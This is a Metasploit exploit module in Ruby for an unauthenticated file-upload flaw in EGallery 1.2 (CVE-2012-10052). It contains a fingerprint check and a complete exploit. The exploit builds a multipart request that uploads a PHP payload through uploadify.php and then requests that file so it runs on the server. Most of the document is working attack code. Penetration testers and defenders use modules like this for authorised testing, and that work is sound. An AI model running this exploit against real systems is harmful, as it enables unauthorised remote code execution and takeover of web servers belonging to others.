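# frozen_string_literal: true

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit for the unauthenticated arbitrary file upload in EGallery 1.2.
#
# egallery/uploadify.php stores the multipart "Filedata" part under the
# attacker-supplied "folder" using the attacker-supplied "Filename", with
# no authentication. Uploading a .php file beneath the web root and then
# requesting it directly therefore executes the PHP payload.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "EGallery PHP File Upload Vulnerability",
        'Description' => %q{
          This module exploits a vulnerability found in EGallery 1.2 By abusing the
          uploadify.php file, a malicious user can upload a file to the egallery/ directory
          without any authentication, which results in arbitrary code execution. The module
          has been tested successfully on Ubuntu 10.04.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Sammy FORGIT', # Discovery, PoC
          'juan vazquez' # Metasploit module
        ],
        'References' => [
          ['CVE', '2012-10052'],
          ['OSVDB', '83891'],
          ['BID', '54464'],
          ['URL', 'http://web.archive.org/web/20170128123244/http://www.opensyscom.fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html']
        ],
        'Payload' => {
          'BadChars' => "\x00"
        },
        'DefaultOptions' => {
          'EXITFUNC' => 'thread'
        },
        'Platform' => ['php'],
        'Arch' => ARCH_PHP,
        'Targets' => [
          ['EGallery 1.2', {}]
        ],
        'Privileged' => false,
        'DisclosureDate' => '2012-07-08',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          # The module writes a PHP file under the web root and never removes
          # it, and every request it sends ends up in the web server's logs.
          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The base path to EGallery', '/sample'])
      ]
    )
  end

  # Probe for the vulnerable upload handler.
  #
  # A bare GET to egallery/uploadify.php on a vulnerable install answers
  # 200 with an empty body. That is a weak fingerprint (any empty PHP file
  # at that path would match), which is why only CheckCode::Appears is
  # claimed rather than Vulnerable.
  #
  # @return [Msf::Exploit::CheckCode] Appears when the fingerprint matches,
  #   Safe otherwise (including on timeout / no response)
  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'egallery', 'uploadify.php')
    )

    return Exploit::CheckCode::Safe unless res && res.code == 200 && res.body.empty?

    Exploit::CheckCode::Appears
  end

  # Upload the PHP payload through uploadify.php, then request it.
  #
  # 1. POST a multipart/form-data body whose "folder" field is the EGallery
  #    base path and whose "Filedata" part carries the PHP payload.
  # 2. Treat the upload as confirmed only if the server answers 200 and
  #    echoes the file name in the body; otherwise abort via fail_with.
  # 3. GET the uploaded file so the web server executes it.
  #
  # @raise [Msf::Exploit::Failed] (through fail_with) when the upload is not
  #   confirmed by the server
  def exploit
    base_uri = normalize_uri(target_uri.path)
    base_uri += '/' unless base_uri.end_with?('/')

    payload_name = "#{rand_text_alpha(rand(10) + 5)}.php"
    boundary = Rex::Text.rand_text_hex(7)

    print_status("Sending PHP payload (#{payload_name})")
    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri("#{base_uri}egallery/uploadify.php"),
      'ctype' => "multipart/form-data; boundary=#{boundary}",
      'data' => multipart_body(boundary, base_uri, payload_name)
    )

    # uploadify.php echoes the stored file name on success; no response,
    # a non-200, or a body without the name is treated as a failed upload.
    unless res && res.code == 200 && res.body.include?(payload_name)
      fail_with(Failure::UnexpectedReply, "File wasn't uploaded, aborting!")
    end

    # The dropped file is not removed automatically: its filesystem path on
    # the server is unknown to this module, so the operator has to clean up.
    print_warning("Uploaded file #{base_uri}#{payload_name} is left on the server; remove it manually when done")

    print_status("Executing PHP payload (#{payload_name})")
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri("#{base_uri}#{payload_name}")
    )

    # A non-200 here usually means no shell either; surface the code so the
    # operator can debug (e.g. 403 from a handler that refuses .php files).
    print_status("Server returned #{res.code}") if res && res.code != 200
  end

  private

  # Build the multipart/form-data body uploadify.php expects.
  #
  # Field order and the CRLF framing mirror the original request: "Filename",
  # "folder", then the "Filedata" file part wrapping the encoded PHP payload.
  #
  # @param boundary [String] multipart boundary
  # @param folder [String] value of the "folder" field (destination directory)
  # @param filename [String] name the uploaded file is stored under
  # @return [String] CRLF-delimited request body, including the closing boundary
  def multipart_body(boundary, folder, filename)
    parts = [
      "--#{boundary}",
      'Content-Disposition: form-data; name="Filename"',
      '',
      filename,
      "--#{boundary}",
      'Content-Disposition: form-data; name="folder"',
      '',
      folder,
      "--#{boundary}",
      "Content-Disposition: form-data; name=\"Filedata\"; filename=\"#{filename}\"",
      '',
      "<?php #{payload.encoded} ?>",
      "--#{boundary}--",
      ''
    ]
    parts.join("\r\n")
  end
end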